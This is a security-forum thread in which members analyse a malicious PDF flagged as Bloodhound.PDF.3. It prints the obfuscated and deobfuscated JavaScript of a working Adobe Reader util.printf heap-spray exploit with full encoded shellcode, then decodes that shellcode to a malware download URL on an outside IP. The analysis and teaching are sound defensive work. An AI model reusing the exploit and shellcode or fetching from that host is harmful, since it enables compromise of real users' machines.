« previous next »
Pages: [1]   Go Down

Author Topic: infected pdf sample  (Read 19814 times)

0 Members and 1 Guest are viewing this topic.

December 20, 2008, 11:07:12 pm
Read 19814 times

DanS

  • Newbie
  • Offline
  • *
  • 6
infected pdf sample
Hi,

Here is a zipped bm[1].pdf that is reported as Bloodhound.PDF.3 by Symantec antivirus.
Any idea how to analyze what it does ?

Thanks,
dans
Logged
December 21, 2008, 02:44:43 am
Reply #1

ocean

  • Special Access
  • Full Member
  • Offline
  • *
  • 49
    • ocean's Inseclab
Re: infected pdf sample
open with an hex editor we can notice in the trailer section "/Encrypt" using pdftk we can decrypt the streams/objects encrypted in the pdf file (the user password is empty).

we can notice a few things, the pdf file is written with the latest version of scribus (1.3.3.12) mod date and creation date are the same 2008 09 07  22:47:39.

streams are also compressed use pdftk (pdftk bad.pdf output bad_uncompressed.pdf uncompress)
here's the obfuscated JS:
Code: [Select]
A='';c='hbiem';z='r){lz';i='ubun';d='rm=';l='"";whi';q='zgak';r='(ubun';g='fun';n='bncrwi';v='.lengt';u='hbiemr';p='le(';w='gakcqq';t='n jrh';j='ctio';h='h>0){l';A+=g+j+t+n+r+c+z+w+d+l+p+i+u+v+h+q;
i='(ub';k='+=ubun';w='ngt';f='r=u';s='biemr';u='h-1);';a='ubunhb';d='cqqrm';v='arAt';t='bunh';m='hbie';o='iem';l='mr.ch';e='mr.le';n='.su';q='unhbie';A+=d+k+m+l+v+i+q+e+w+u+a+o+f+t+s+n;
z='ng(0,';h='ubunhb';g='bstri';e='};';i='akcq';x=' lzg';m='qrm;';w='iem';q='return';t='r.le';v='ngth';d='-1);}';A+=g+z+h+w+t+v+d+q+x+i+m+e;
;eval(A);A='';f=jrhbncrwi('u%8e0');j=jrhbncrwi('%00');e=jrhbncrwi(' daoly');t=jrhbncrwi('0000u');c=jrhbncrwi('%0000');w=jrhbncrwi('senu =');p=jrhbncrwi('rav');b=jrhbncrwi('0u%');o=jrhbncrwi('"(epac');m=jrhbncrwi('%419bu');a=jrhbncrwi('%385cu');h=jrhbncrwi('d5u');r=jrhbncrwi('354u%');s=jrhbncrwi('0bd3u%');u=jrhbncrwi('ap ');l=jrhbncrwi('%b810u');A+=p+u+e+w+o+b+f+c+h+j+a+m+l+t+s+r;
e=jrhbncrwi('fbeu');q=jrhbncrwi('%00');k=jrhbncrwi('dau%da');n=jrhbncrwi('dau');d=jrhbncrwi('695u%d');s=jrhbncrwi('%da4d');i=jrhbncrwi('dau%9');p=jrhbncrwi('u%0');y=jrhbncrwi('d3u%c9');b=jrhbncrwi('1cd3u');v=jrhbncrwi('%9457');l=jrhbncrwi('d0u%2');h=jrhbncrwi('054u%0');o=jrhbncrwi('au%da');f=jrhbncrwi('u%dad');w=jrhbncrwi('3d3u%');A+=h+p+v+e+i+q+n+k+o+f+s+b+w+d+l+y;
d=jrhbncrwi('10u%14');i=jrhbncrwi('13u%');l=jrhbncrwi('%55');m=jrhbncrwi('0u%43');c=jrhbncrwi('6bu%53');v=jrhbncrwi('bu%d3');w=jrhbncrwi('%0bd7');o=jrhbncrwi('136');p=jrhbncrwi('54u%d3');t=jrhbncrwi('09u%6b');z=jrhbncrwi('6du%');b=jrhbncrwi('5u%12');u=jrhbncrwi('6bu');y=jrhbncrwi('u%d79');e=jrhbncrwi('d4u%d7');q=jrhbncrwi('6b5');A+=p+v+o+i+e+t+b+q+z+c+m+y+w+u+d+l;
y=jrhbncrwi('%d3d');s=jrhbncrwi('5u%8');r=jrhbncrwi('525u');h=jrhbncrwi('3u%2b');d=jrhbncrwi('93u%');w=jrhbncrwi('5du%75');k=jrhbncrwi('150');x=jrhbncrwi('d355');m=jrhbncrwi('%fd4cu');a=jrhbncrwi('d3u');l=jrhbncrwi('u%3');o=jrhbncrwi('%46');e=jrhbncrwi('5d3u%5');g=jrhbncrwi('6bacu');i=jrhbncrwi('4f4u%');p=jrhbncrwi('2cu%');A+=g+d+w+o+a+h+y+m+r+e+l+x+i+s+k+p;
h=jrhbncrwi('5du%b');d=jrhbncrwi('a7dbu');t=jrhbncrwi('6u%');j=jrhbncrwi('26bu');c=jrhbncrwi('d3u%');p=jrhbncrwi('%44d3u');g=jrhbncrwi('20d3u%');b=jrhbncrwi('%5d');u=jrhbncrwi('u%20');e=jrhbncrwi('%96');z=jrhbncrwi('a7dbu%');x=jrhbncrwi('%d3d3u');a=jrhbncrwi('6baeu');r=jrhbncrwi('%a7a');v=jrhbncrwi('847cu%');f=jrhbncrwi('%847c');A+=e+j+h+b+p+x+a+z+g+v+t+r+d+c+u+f;
b=jrhbncrwi('36bu');v=jrhbncrwi('32cu%c');p=jrhbncrwi('%c3d3u');h=jrhbncrwi('93u');f=jrhbncrwi('%4fcbu');y=jrhbncrwi('613u%d');g=jrhbncrwi('c6u%d');i=jrhbncrwi('%26e0');j=jrhbncrwi('6u%b');e=jrhbncrwi('3d3');t=jrhbncrwi('u%6');r=jrhbncrwi('u%55');z=jrhbncrwi('%1d93u');m=jrhbncrwi('b2du');a=jrhbncrwi('%f6e6');q=jrhbncrwi('u%1e');A+=m+t+i+f+z+p+b+g+q+a+h+r+e+v+y+j;
m=jrhbncrwi('7ccbu%');s=jrhbncrwi('84e');e=jrhbncrwi('60u%');c=jrhbncrwi('d384u');w=jrhbncrwi('41cu%');j=jrhbncrwi('3u%548');t=jrhbncrwi('%db');u=jrhbncrwi('5u%6');f=jrhbncrwi('e6e7u%');l=jrhbncrwi('%c6f6');v=jrhbncrwi('6bf3u');k=jrhbncrwi('5u%318');y=jrhbncrwi('%eb6');q=jrhbncrwi('34bu');h=jrhbncrwi('u%764');d=jrhbncrwi('du%');A+=h+l+v+f+e+t+c+m+w+u+k+j+s+d+y+q;
n=jrhbncrwi('3u%d');d=jrhbncrwi('5u%e7');a=jrhbncrwi('0dfu%');k=jrhbncrwi('bu%');c=jrhbncrwi('93u%');y=jrhbncrwi('%bf');z=jrhbncrwi('fu%5');m=jrhbncrwi('e7u%54');t=jrhbncrwi('05bu%');x=jrhbncrwi('318');f=jrhbncrwi('667');u=jrhbncrwi('85u%');l=jrhbncrwi('cf93u%');v=jrhbncrwi('e3a');g=jrhbncrwi('87d');b=jrhbncrwi('53d3u');A+=z+v+c+d+x+u+m+y+b+k+f+l+t+n+g+a;
y=jrhbncrwi('u%e');m=jrhbncrwi('u%d');i=jrhbncrwi('93u%');r=jrhbncrwi('b375u');z=jrhbncrwi('4u%e');p=jrhbncrwi('%d6d6');b=jrhbncrwi('%9376');d=jrhbncrwi('u%2cb');n=jrhbncrwi('6u%');f=jrhbncrwi('6u%c3e');h=jrhbncrwi('62cu%');o=jrhbncrwi('%b6d2');v=jrhbncrwi('e6a6u');u=jrhbncrwi('46ebu');g=jrhbncrwi('%d38');w=jrhbncrwi('b5cu');A+=y+p+v+h+m+o+w+z+g+r+n+f+d+b+u+i;
u=jrhbncrwi('b66b');l=jrhbncrwi('%b66b');n=jrhbncrwi('%70d');k=jrhbncrwi('u%3');i=jrhbncrwi('bu%ff');x=jrhbncrwi('u%e38c');s=jrhbncrwi('3u%c7d');b=jrhbncrwi('498u');m=jrhbncrwi('b94u');c=jrhbncrwi('8cu%b4');t=jrhbncrwi('b6u%8');p=jrhbncrwi('154u%6');h=jrhbncrwi('d1u%');f=jrhbncrwi('u%53');j=jrhbncrwi('c6u%2c');r=jrhbncrwi('%8410u');A+=i+s+n+b+t+j+f+l+r+m+p+k+x+u+h+c;
c=jrhbncrwi('%03e3u');l=jrhbncrwi('7c7u%');n=jrhbncrwi('e04fu');f=jrhbncrwi('%9453u');p=jrhbncrwi('9e3u%4');m=jrhbncrwi('2u%6e2');z=jrhbncrwi('u%6d');u=jrhbncrwi('%7ed7u');v=jrhbncrwi('%cf6fu');i=jrhbncrwi('ccu');x=jrhbncrwi('0u%0');q=jrhbncrwi('3u%8fe');g=jrhbncrwi('6022');a=jrhbncrwi('%70b');r=jrhbncrwi('eu%38d');t=jrhbncrwi('%e3');A+=t+n+l+p+x+q+m+r+a+f+v+c+u+i+z+g;
v=jrhbncrwi('2e3u');b=jrhbncrwi('%84');r=jrhbncrwi('6u%136');c=jrhbncrwi('936u%e');o=jrhbncrwi('%0e6b');e=jrhbncrwi('%36');q=jrhbncrwi('91u%36');h=jrhbncrwi('7u%b');f=jrhbncrwi('38fu%');g=jrhbncrwi('6bu');n=jrhbncrwi('56bu%e');s=jrhbncrwi('%6b3');l=jrhbncrwi('u%1');m=jrhbncrwi('30eu');x=jrhbncrwi('adu%');y=jrhbncrwi('936bu');A+=x+b+g+q+e+m+n+h+r+s+v+l+o+y+f+c;
g=jrhbncrwi('3334u%');b=jrhbncrwi('%3733u');t=jrhbncrwi('u%7221');a=jrhbncrwi('e0u%');y=jrhbncrwi('u%7f');w=jrhbncrwi('3c7bu');l=jrhbncrwi('u%46ef');e=jrhbncrwi('%1d5au');r=jrhbncrwi('u%6');s=jrhbncrwi('d2c');p=jrhbncrwi('5efdu%');v=jrhbncrwi('u%3c2');o=jrhbncrwi('%2c3b');q=jrhbncrwi('7bu%e4');h=jrhbncrwi('cu%5');d=jrhbncrwi('u%66b0');A+=r+l+s+h+v+o+b+e+w+g+p+a+q+y+d+t;
n=jrhbncrwi('21u%94');g=jrhbncrwi('u%70');p=jrhbncrwi('1b0u%d');i=jrhbncrwi('u%d4a4');o=jrhbncrwi('7c6');j=jrhbncrwi('u%2140');b=jrhbncrwi('0d0u%');a=jrhbncrwi('31c');q=jrhbncrwi('94u%e4');d=jrhbncrwi('f031');k=jrhbncrwi('d4u%55');v=jrhbncrwi('b02');x=jrhbncrwi('1u%3');e=jrhbncrwi('d3u%7');u=jrhbncrwi('b0f0u%');y=jrhbncrwi('0u%');A+=i+o+e+q+k+n+g+j+d+u+y+a+b+p+x+v;
t=jrhbncrwi('5u%');x=jrhbncrwi('%f50');g=jrhbncrwi('0u%45');r=jrhbncrwi('0f5u');y=jrhbncrwi('00u');w=jrhbncrwi('40c5');o=jrhbncrwi('%21');c=jrhbncrwi('%85d');d=jrhbncrwi('85u%95');v=jrhbncrwi('20u');j=jrhbncrwi('90u%f');e=jrhbncrwi('20u');b=jrhbncrwi('%e5a5u');k=jrhbncrwi('u%55');q=jrhbncrwi('3u%');l=jrhbncrwi('%504');A+=t+x+v+o+y+k+w+q+c+b+e+g+l+r+j+d;
y=jrhbncrwi('0u%');j=jrhbncrwi('5u%40c');u=jrhbncrwi('0u%b0');l=jrhbncrwi('d0b0u');f=jrhbncrwi('%d0');b=jrhbncrwi('d0u');o=jrhbncrwi('u%b5d');c=jrhbncrwi('95c5u');w=jrhbncrwi('f0u%');v=jrhbncrwi('%40c');e=jrhbncrwi('5u%b0');p=jrhbncrwi('%d0c');a=jrhbncrwi('a0d0');n=jrhbncrwi('u%d0d');i=jrhbncrwi('e0u%');z=jrhbncrwi('0u%d0');A+=u+p+b+z+o+a+w+f+c+i+e+j+v+l+y+n;
i=jrhbncrwi('d0d0');g=jrhbncrwi('d0d');p=jrhbncrwi('0u%d0c');z=jrhbncrwi('u%8');l=jrhbncrwi('0d0');q=jrhbncrwi('0u%d');d=jrhbncrwi('%e5c0u');v=jrhbncrwi('0u%');u=jrhbncrwi('0u%d09');a=jrhbncrwi('%d0f');f=jrhbncrwi('0u%');x=jrhbncrwi('%e0c0');j=jrhbncrwi('0u%d0d');m=jrhbncrwi('0d0u');b=jrhbncrwi('0e0u');s=jrhbncrwi('u%4');A+=l+q+j+g+f+a+d+m+z+x+b+s+i+v+p+u;
n=jrhbncrwi('"= po');l=jrhbncrwi('v;)"d');a=jrhbncrwi(' rof;"');p=jrhbncrwi('=tnCi(');w=jrhbncrwi('u%c0');z=jrhbncrwi('>tnC');y=jrhbncrwi('i;821');k=jrhbncrwi('0d3');b=jrhbncrwi('%d0d0');j=jrhbncrwi('a0u');u=jrhbncrwi('0d0u%d');r=jrhbncrwi('%d04');d=jrhbncrwi('d0d0u');x=jrhbncrwi('n ra');g=jrhbncrwi('0d0u%');t=jrhbncrwi('u%d');A+=r+d+g+u+t+b+j+w+k+l+x+n+a+p+y+z;
j=jrhbncrwi('u =+');t=jrhbncrwi('n =');h=jrhbncrwi('olb');q=jrhbncrwi('paeh;)');z=jrhbncrwi('"0909');w=jrhbncrwi('csen');g=jrhbncrwi('909u%0');p=jrhbncrwi('09u%0');u=jrhbncrwi('u%090');b=jrhbncrwi('9u%09');x=jrhbncrwi(';0=');l=jrhbncrwi('tnCi--');n=jrhbncrwi(' pon )');o=jrhbncrwi(' kc');f=jrhbncrwi('909u%"');s=jrhbncrwi('(epa');A+=x+l+n+j+w+s+f+g+p+b+u+z+q+h+o+t;
r=jrhbncrwi('aeh');u=jrhbncrwi('h;)"0');o=jrhbncrwi('olbgi');w=jrhbncrwi(' = kc');t=jrhbncrwi('redae');b=jrhbncrwi(' = ');g=jrhbncrwi('909u%0');z=jrhbncrwi('(epa');l=jrhbncrwi('b;da');y=jrhbncrwi('909u%"');h=jrhbncrwi('yarps;');v=jrhbncrwi('+ po');s=jrhbncrwi('02 = e');n=jrhbncrwi('olyap ');p=jrhbncrwi('csenu');e=jrhbncrwi('zis');A+=v+n+l+o+w+p+z+y+g+u+t+e+s+h+b+r;
m=jrhbncrwi('gib )y');h=jrhbncrwi('olb');b=jrhbncrwi('lbpaeh');n=jrhbncrwi('hw;');o=jrhbncrwi('l.kco');x=jrhbncrwi('olbgib');t=jrhbncrwi('sred');g=jrhbncrwi('htgne');f=jrhbncrwi('tgnel.');l=jrhbncrwi('+ezi');v=jrhbncrwi('if;kc');r=jrhbncrwi('lbgib');s=jrhbncrwi('=+kc');u=jrhbncrwi('kco');q=jrhbncrwi('( eli');d=jrhbncrwi('arps<h');A+=t+l+b+o+g+n+q+r+u+f+d+m+h+s+x+v;
x=jrhbncrwi('sbus.');m=jrhbncrwi(' = kc');f=jrhbncrwi('0(gn');u=jrhbncrwi('olb;');d=jrhbncrwi('lbgib');h=jrhbncrwi('= k');c=jrhbncrwi('irt');y=jrhbncrwi(',0(g');p=jrhbncrwi('kcolb');w=jrhbncrwi('sbus');a=jrhbncrwi('gib ');b=jrhbncrwi('colbll');r=jrhbncrwi('nirt');v=jrhbncrwi('rps ,');s=jrhbncrwi(')ya');z=jrhbncrwi('.kco');A+=b+h+a+p+x+c+f+v+s+u+m+d+z+w+r+y;
r=jrhbncrwi('= kcol');o=jrhbncrwi('b+k');s=jrhbncrwi('ps-h');m=jrhbncrwi('tgnel.');z=jrhbncrwi('el.k');e=jrhbncrwi(' < ya');c=jrhbncrwi('ib ');f=jrhbncrwi('elihw');u=jrhbncrwi('htgn');x=jrhbncrwi(';)yar');v=jrhbncrwi('rps+');i=jrhbncrwi('04x0');d=jrhbncrwi('kcolbg');k=jrhbncrwi('colb ');a=jrhbncrwi('colb(');t=jrhbncrwi('b )000');A+=c+d+m+s+x+f+a+z+u+v+e+i+t+r+k+o;
l=jrhbncrwi('f;)(');u=jrhbncrwi('=i( ro');p=jrhbncrwi(' + ');b=jrhbncrwi('= ]i');q=jrhbncrwi(' wen ');m=jrhbncrwi('= m');y=jrhbncrwi('em;');v=jrhbncrwi('1<i;0');a=jrhbncrwi('+kcol');w=jrhbncrwi('i;004');d=jrhbncrwi('kcolb ');t=jrhbncrwi('[me');x=jrhbncrwi('lif');z=jrhbncrwi('m )++');g=jrhbncrwi('kcolbl');h=jrhbncrwi('yarrA');A+=a+x+g+y+m+q+h+l+u+v+w+z+t+b+d+p;
h=jrhbncrwi(';kco');q=jrhbncrwi('992');f=jrhbncrwi('88888');u=jrhbncrwi('99999');r=jrhbncrwi('lbp');a=jrhbncrwi('888');t=jrhbncrwi('99999');e=jrhbncrwi(' mun ');m=jrhbncrwi('9999');i=jrhbncrwi('aeh');k=jrhbncrwi('1 =');s=jrhbncrwi('88888');l=jrhbncrwi('88888');j=jrhbncrwi('888');x=jrhbncrwi('8899');v=jrhbncrwi('rav');A+=i+r+h+v+e+k+q+m+t+u+x+j+a+f+s+l;
q=jrhbncrwi('888');b=jrhbncrwi('88888');z=jrhbncrwi('8888');n=jrhbncrwi('888');d=jrhbncrwi('888');w=jrhbncrwi('888');a=jrhbncrwi('888');h=jrhbncrwi('888');m=jrhbncrwi('8888');l=jrhbncrwi('8888');e=jrhbncrwi('8888');t=jrhbncrwi('888');x=jrhbncrwi('888888');r=jrhbncrwi('88888');y=jrhbncrwi('8888');s=jrhbncrwi('88888');A+=y+e+t+z+r+l+d+m+w+n+q+x+a+s+h+b;
k=jrhbncrwi('888888');y=jrhbncrwi('8888');h=jrhbncrwi('888888');r=jrhbncrwi('8888');c=jrhbncrwi('888888');g=jrhbncrwi('88888');d=jrhbncrwi('888');x=jrhbncrwi('888');e=jrhbncrwi('888888');u=jrhbncrwi('88888');z=jrhbncrwi('888888');w=jrhbncrwi('88888');s=jrhbncrwi('88888');l=jrhbncrwi('888888');b=jrhbncrwi('8888');m=jrhbncrwi('8888');A+=l+r+y+d+u+w+z+b+c+e+g+m+s+h+k+x;
o=jrhbncrwi('88888');v=jrhbncrwi('8888');i=jrhbncrwi('888');d=jrhbncrwi('888');j=jrhbncrwi('888888');l=jrhbncrwi('8888');n=jrhbncrwi('88888');h=jrhbncrwi('888');x=jrhbncrwi('8888');b=jrhbncrwi('888');y=jrhbncrwi('8888');m=jrhbncrwi('888');u=jrhbncrwi('888');c=jrhbncrwi('888');g=jrhbncrwi('888');q=jrhbncrwi('88888');A+=i+j+n+c+o+b+x+u+g+l+d+y+v+m+h+q;
r=jrhbncrwi('88888');x=jrhbncrwi('000');u=jrhbncrwi('irp');g=jrhbncrwi('888888');j=jrhbncrwi('888888');m=jrhbncrwi('.litu;');k=jrhbncrwi('54%"');z=jrhbncrwi('888888');s=jrhbncrwi('888888');y=jrhbncrwi('888');d=jrhbncrwi('888');i=jrhbncrwi('8888');b=jrhbncrwi('8888');t=jrhbncrwi('8888');f=jrhbncrwi('88888');n=jrhbncrwi('(ftn');A+=g+r+b+s+z+t+i+d+j+y+f+m+u+n+k+x;
b=jrhbncrwi('un,"f');r=jrhbncrwi(';)m');A+=b+r;
;eval(A);
malzilla seems to not be able to successfully end the second eval, maybe the heap spray takes too much memory.
so just change the last eval to document.write and we get deobfuscated JS:
Code: [Select]
var payload = unescape("%u00e8%u0000%u5d00%uc583%ub914%u018b%u0000%u3db0%u4530%u4500%u7549%uebf9%uad00%uadad%uadad%uadad%ud4ad%u3dc1%u3d3d%u5962%u0d9c%u3d3d%u453d%ub631%u317d%u4db6%u9021%u55b6%ud635%ub634%u097d%u7db0%ub641%u0155%ucab6%u3957%ud564%u3db2%u3d3d%uc4df%u5255%u3d53%u553d%u4f48%u5051%uc269%ub62b%ud5d5%u3d44%u3d3d%ueab6%ubd7a%u3d02%uc748%u6a7a%ubd7a%u3d02%uc748%ud2b6%u0e62%ubcf4%u39d1%u3d3c%ub63d%u6ce1%u6e6f%u3955%u3d3c%uc23d%u316b%u6467%u6f6c%u3fb6%u7e6e%u06bd%u483d%ubcc7%uc146%u5813%u5845%u3e48%ud6be%ub435%ufa3e%u397e%u5813%u5845%u7efb%u3d35%ub766%u39fc%ub50d%u3d78%ufd0e%u6d6d%u6a6e%uc26d%u2d6b%uc5be%u483d%u573b%u6e3c%u6bc2%u6739%ube64%u39ff%ubd7c%u3d07%u8948%u6bc2%u6c35%ub66b%u0148%u49b6%u4513%uc83e%ub66b%u1d4b%uc83e%uf40e%u7c74%u3e90%u0ef8%u32e6%u2d83%ueb07%u3549%uf6fc%u3e30%u7de7%uccd6%u2206%uda48%ub663%u1963%ue03e%ub65b%u7631%u63b6%u3e21%ub6e0%ub639%uf83e%u6396%ufe64%uc2d5%uc2c3%ub3c2%u3373%ua5d1%ub7c3%u4333%udfe5%u0e4e%ub7f7%u0b66%u1227%u4a4d%u6c77%u3d4e%u4955%u4d49%u1207%u0412%u130f%u0f0b%u0c13%u0d0d%u0b13%u120b%u505f%u0212%u0055%u5c04%u3d58%u5a5e%u0254%u0405%u5f0f%u0959%u580b%u0c0d%u0d0d%u0d5b%u0d0a%u0f0d%u5c59%u0e0b%u5c04%u5c04%u0b0d%u0d0d%u0d0d%u0d0d%u0d0d%u0f0d%u0c5e%u0d08%u0c0e%u0e04%u0d0d%u0c0d%u090d%u040d%u0d0d%u0d0d%u0d0d%u0d0d%u0a0c%u3d0d");var nop ="";for (iCnt=128;iCnt>=0;--iCnt) nop += unescape("%u9090%u9090%u9090%u9090%u9090");heapblock = nop + payload;bigblock = unescape("%u9090%u9090");headersize = 20;spray = headersize+heapblock.length;while (bigblock.length<spray) bigblock+=bigblock;fillblock = bigblock.substring(0, spray);block = bigblock.substring(0, bigblock.length-spray);while(block.length+spray < 0x40000) block = block+block+fillblock;mem = new Array();for (i=0;i<1400;i++) mem[i] = block + heapblock;var num = 12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;util.printf("%45000f",num);
as you can see it exploits the util.printf vulnerability (http://www.coresecurity.com/content/adobe-reader-buffer-overflow)

the shellcode contains a simple xor loop and
Code: [Select]
http://92.62.xx.xx/bm/?h=9ae cgi?892bd46e0100f07002da639a9a060000000002c15031930001040900000000170
regards
ocean
Logged
December 22, 2008, 10:33:48 pm
Reply #2

DanS

  • Newbie
  • Offline
  • *
  • 6
Re: infected pdf sample
ocean, this is very interesting for me, thanks for sharing.
i was able to follow the steps you described but i am not able to parse the shell code using Malzilla's Decode UCS2 - or at least I couldn't see any string like
Code: [Select]
http://92.62.
thanks,
dans
Logged
December 22, 2008, 11:32:15 pm
Reply #3

DanS

  • Newbie
  • Offline
  • *
  • 6
Re: infected pdf sample
Got one step more, but still questioning.
Using XORSearch_V1_3_0:
Code: [Select]
Found XOR 1D position 0142: HTTP..................BM..H..AE CGI....BD..E.......F
.......DA...A.A......................C..........................................

Found XOR 3D position 0142: http://92.62.10707.66/bm/?h.9ae
This hxxp://92.62.10707.66 could not be a valid IP address. Any clues?

Thanks, dans
Logged
December 22, 2008, 11:35:00 pm
Reply #4

SysAdMini

  • Administrator
  • Hero Member
  • Offline
  • *****
  • 3335
Re: infected pdf sample
xorsearch v1.3 works fine for me.

Code: [Select]
XORSearch.exe hexfile.bin http
Found XOR 3D position 0140: http://92.62.100.66/bm/?h=9ae
Logged
Ruining the bad guy's day
December 23, 2008, 12:55:59 am
Reply #5

DanS

  • Newbie
  • Offline
  • *
  • 6
Re: infected pdf sample
Yes, it worked !
Getting
Code: [Select]
%u00e8%u0000%u5d00%uc583%ub914%u018b%u0000%u3db0%u4530%u4500%u7549%uebf9%uad00%uadad%uadad%uadad%ud4ad%u3dc1%u3d3d%u5962%u0d9c%u3d3d%u453d%ub631%u317d%u4db6%u9021%u55b6%ud635%ub634%u097d%u7db0%ub641%u0155%ucab6%u3957%ud564%u3db2%u3d3d%uc4df%u5255%u3d53%u553d%u4f48%u5051%uc269%ub62b%ud5d5%u3d44%u3d3d%ueab6%ubd7a%u3d02%uc748%u6a7a%ubd7a%u3d02%uc748%ud2b6%u0e62%ubcf4%u39d1%u3d3c%ub63d%u6ce1%u6e6f%u3955%u3d3c%uc23d%u316b%u6467%u6f6c%u3fb6%u7e6e%u06bd%u483d%ubcc7%uc146%u5813%u5845%u3e48%ud6be%ub435%ufa3e%u397e%u5813%u5845%u7efb%u3d35%ub766%u39fc%ub50d%u3d78%ufd0e%u6d6d%u6a6e%uc26d%u2d6b%uc5be%u483d%u573b%u6e3c%u6bc2%u6739%ube64%u39ff%ubd7c%u3d07%u8948%u6bc2%u6c35%ub66b%u0148%u49b6%u4513%uc83e%ub66b%u1d4b%uc83e%uf40e%u7c74%u3e90%u0ef8%u32e6%u2d83%ueb07%u3549%uf6fc%u3e30%u7de7%uccd6%u2206%uda48%ub663%u1963%ue03e%ub65b%u7631%u63b6%u3e21%ub6e0%ub639%uf83e%u6396%ufe64%uc2d5%uc2c3%ub3c2%u3373%ua5d1%ub7c3%u4333%udfe5%u0e4e%ub7f7%u0b66%u1227%u4a4d%u6c77%u3d4e%u4955%u4d49%u1207%u0412%u130f%u0f0b%u0c13%u0d0d%u0b13%u120b%u505f%u0212%u0055%u5c04%u3d58%u5a5e%u0254%u0405%u5f0f%u0959%u580b%u0c0d%u0d0d%u0d5b%u0d0a%u0f0d%u5c59%u0e0b%u5c04%u5c04%u0b0d%u0d0d%u0d0d%u0d0d%u0d0d%u0f0d%u0c5e%u0d08%u0c0e%u0e04%u0d0d%u0c0d%u090d%u040d%u0d0d%u0d0d%u0d0d%u0d0d%u0a0c%u3d0dand parsing it through Malzilla's Misc Decoders using "UCs2 To Hex'
Code: [Select]
e8000000005d83c514b98b010000b03d304500454975f9eb00adadadadadadadadd4c13d3d3d62599c0d3d3d3d4531b67d31b64d2190b65535d634b67d09b07d41b65501b6ca573964d5b23d3d3ddfc45552533d3d55484f515069c22bb6d5d5443d3d3db6ea7abd023d48c77a6a7abd023d48c7b6d2620ef4bcd1393c3d3db6e16c6f6e55393c3d3dc26b3167646c6fb63f6e7ebd063d48c7bc46c113584558483ebed635b43efa7e3913584558fb7e353d66b7fc390db5783d0efd6d6d6e6a6dc26b2dbec53d483b573c6ec26b396764beff397cbd073d4889c26b356c6bb64801b64913453ec86bb64b1d3ec80ef4747c903ef80ee632832d07eb4935fcf6303ee77dd6cc062248da63b663193ee05bb63176b663213ee0b639b63ef8966364fed5c2c3c2c2b37333d1a5c3b73343e5df4e0ef7b7660b27124d4a776c4e3d5549494d071212040f130b0f130c0d0d130b0b125f5012025500045c583d5e5a540205040f5f59090b580d0c0d0d5b0d0a0d0d0f595c0b0e045c045c0d0b0d0d0d0d0d0d0d0d0d0f5e0c080d0e0c040e0d0d0d0c0d090d040d0d0d0d0d0d0d0d0c0a0d3dand saved 'Hex To File" hexfile.bin
and running:
XORSearch.exe hexfile.bin http
the output is:
Code: [Select]
Found XOR 3D position 0140: http://92.62.100.66/bm/?h=9ae
Two days browsing this site and getting so much knowledge.
Thank you guys!
dans
Logged
December 23, 2008, 09:33:15 am
Reply #6

bobby

  • Special Members
  • Hero Member
  • Offline
  • *
  • 322
    • Malzilla
Re: infected pdf sample
In Malzilla you have the same functionality you got from XORSearch

Get the binary string (output after UCS2 to Hex).
Go to Hex View tab.
Right-click on left (big) box and chose Paste As Hex.
In the "strings to find" box put the words you search for, one per line. In this case put just "http://"
Click on Find and wait a little bit.
If a XOR key is found, it will appear in "Key:" box.
Click on Apply XOR.
Thats all.


There is one, more scientific way.
After you did "Paste as Hex", click on "Disassemble" button.
Take a look at the very beginning of the code:
Code: [Select]
E800000000           call                +0x00000000
5D                   pop                 ebp
83C514               add                 ebp, 0x00000014
B98B010000           mov                 ecx, 0x0000018B
B03D                 mov                 al, 0x0000003D
304500               xor                 [ebp], alLast command in this code fragment is XOR [ebp], al, and we have mov al, 3D before that.
See, the key is in the code.

Happy reversing ;)
Logged
December 23, 2008, 09:39:59 am
Reply #7

bobby

  • Special Members
  • Hero Member
  • Offline
  • *
  • 322
    • Malzilla
Re: infected pdf sample
Quote from: ocean on December 21, 2008, 02:44:43 am
the shellcode contains a simple xor loop and
Code: [Select]
http://92.62.xx.xx/bm/?h=9ae cgi?892bd46e0100f07002da639a9a060000000002c15031930001040900000000170
regards
ocean
Be careful, there is a zero byte after ?h=9ae (look again in hex editor).
It means that the URL end there. The rest is not part of the same URL.
Logged
December 23, 2008, 09:45:57 am
Reply #8

bobby

  • Special Members
  • Hero Member
  • Offline
  • *
  • 322
    • Malzilla
Re: infected pdf sample
Quote from: DanS on December 22, 2008, 11:32:15 pm
Got one step more, but still questioning.
Using XORSearch_V1_3_0:
Code: [Select]
Found XOR 1D position 0142: HTTP..................BM..H..AE CGI....BD..E.......F
.......DA...A.A......................C..........................................

Found XOR 3D position 0142: http://92.62.10707.66/bm/?h.9ae
This hxxp://92.62.10707.66 could not be a valid IP address. Any clues?

Thanks, dans
Theoretically, it can be a valid IP address.
There are many legit ways to write IP address.
It has nothing to do with this case here, but just to mention this for the case you get such addresses somewhere in your future work.
Please, take a look at the following article:
http://pc-help.org/obscure.htm

Malzilla contains an de-obfuscator for such addresses (Tools > IP converter).
Logged
December 23, 2008, 12:31:24 pm
Reply #9

ocean

  • Special Access
  • Full Member
  • Offline
  • *
  • 49
    • ocean's Inseclab
Re: infected pdf sample
the shellcode "replaces" the \0 byte with 0x2e (".").

try loading the url in firefox tell you the gif cannot be loaded cause the mime type is gif
just download the malware using wget or similar ;)

i wrote an entry about this on my blog http://inseclab.netsons.org/2008/12/21/analyzing-a-malicious-pdf-file/

regards
ocean
Logged
December 23, 2008, 04:25:27 pm
Reply #10

bobby

  • Special Members
  • Hero Member
  • Offline
  • *
  • 322
    • Malzilla
Re: infected pdf sample
Thanks ocean.
I wasn't aware of the replacing routine in the shellcode.
Logged
Pages: [1]   Go Up
« previous next »